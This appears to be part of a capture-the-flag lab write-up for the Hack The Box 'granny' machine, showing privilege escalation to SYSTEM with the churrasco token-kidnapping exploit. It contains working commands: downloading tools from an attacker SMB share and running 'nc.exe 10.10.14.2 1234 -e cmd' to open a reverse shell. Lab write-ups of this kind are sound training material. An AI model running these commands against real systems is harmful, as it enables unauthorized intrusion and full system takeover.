Token Kidnapping
churrasco Exploit. Effective against older systems with:
CVE-2008-1436CVE-2009-0079CVE-2008-1436- and many more
Exploitation
C:\tmp>copy \\10.10.14.2\smb\churrasco.exe .
1 file(s) copied.
C:\tmp>copy \\10.10.14.2\smb\nc.exe .
1 file(s) copied.Delivery complete
C:\tmp>churrasco.exe
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"Netcat will be used for command execution
C:\tmp>churrasco.exe -d "C:\\tmp\\nc.exe 10.10.14.2 1234 -e cmd"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 672
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!Launching the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1035
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP> whoami
whoami
nt authority\system
C:\WINDOWS\TEMP> hostname
hostname
granny
C:\WINDOWS\TEMP> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.10.10.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2System Level Compromise